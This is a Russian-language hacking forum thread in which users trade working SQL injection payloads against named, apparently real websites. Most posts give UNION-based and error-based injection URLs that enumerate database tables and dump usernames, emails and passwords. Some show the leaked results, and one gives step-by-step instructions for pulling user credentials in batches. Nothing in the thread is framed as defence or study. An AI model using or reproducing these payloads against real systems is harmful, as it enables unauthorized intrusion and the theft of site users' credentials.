Потому что там двойной запрос. Надоели такие вопросы, появляются постоянно! Учите мат. часть. Зачем же так, когда все делается намного проще: http://www.oaontc.ru/node/243?SysNum=137159+and+1=2+union+select+1,version(),3,4,5--+ 4.1.25-log
http://www.oaontc.ru/node/243?SysNum=-13+union+select+1,version%28%29,3,4,5-- А так не проще? или я чегото не догоняю?
Похоже что это sql-inj Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть? http://www.cue.ru/catalog.php?pid=1'
pid=1)+order+by+1/* upd: HTML: http://www.cue.ru/catalog.php?pid=1)+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)a+group+by+mid(concat_ws(0x3a,version(),user(),database()),floor(rand(0)*2),64))/* 4.1.15-Debian_1-log:qp_newcue@localhost:qp_newcue
Раз такая пьянка, тогда можно и так: Code: http://www.oaontc.ru/node/243?SysNum=(0)union+select(version())--+
что можно придумать если запрос в котором есть точка обрезается после неё, те невозможно получить информацию к примеру из information_schema.tables получается information_schema все что после режется.
народ подскажите пожалуйста как дальше разкручивать подобный скуль http://www.photoclub.com.ua/rubric/?id=34' union select 1 from rubric where 1='
ухты, спасибо, а вот ещо вопрос, столбцы подобраны правильно http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x75736572-- а вот например вывести пароли из узер неполучается, почему? http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,Password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+user--
Есть сайт. Главная: http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1 Подскажите как можно нарыть уязвимости, на SQL Injection на ощупь не получаетс: http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1' -ошибки не выдает http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2-1 - выкидывает на другую страницу. Если это фильтрация то каким способом можно ее обойти? p.s. Извините за возможно глупый вопрос.
http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(user,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user--
Запрос: HTML: http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x2e,table_schema,table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.tables+where+table_name+like+0x257573657225--+ Результат: HTML: nw.phpbb_users,nw_mir.users,trvlr_forum.phpbb3users,trvlr_forum.phpbb_users,trvlr_top.users Выбираешь нужную таблицу. Для примера trvlr_top.users 1) Узнаем колонки Запрос: HTML: http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x7573657273+AND+table_schema=0x7472766C725F746F70--+ Результат: HTML: memberid,sitename,url,email,description,password,clicksin,clicksout,hits,date,passreset,passreset2,rank,id_kat,hosts,knopka,mail,open,all,status,users,ocenka,checker,login,chastota,fio,open_link,content,title,server,desc,keyword,time,chk_date,chk_result,is_new,is_violator,days_left,mail_sent,chk_attempts 2) Выводим юзеров Запросы: HTML: http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,memberid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+trvlr_top.users+where+memberid+between+1+and+20--+ HTML: http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,memberid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+trvlr_top.users+where+memberid+between+21+and+40--+ и т.д.
А можно поинтерисоватся, http://www.photoclub.com.ua/rubric/?id=34'+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(version() ,floor(rand(0)*2)))--+' я такой запрос вижу в первый раз, может мно хтото обьяснить што ето, особенно интерисует +or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x и floor(rand(0)*2))
Здесь есть Blind http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0 http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogsection&id=3 http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1
Да что вы. Здесь нет SQL. Параметр обрабатывается функцией intval. Т е первые цифры сохраняються, а всё что идёт после них обрезаеться. Пример: Code: http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2'''')))) Пиши всё что угодно!
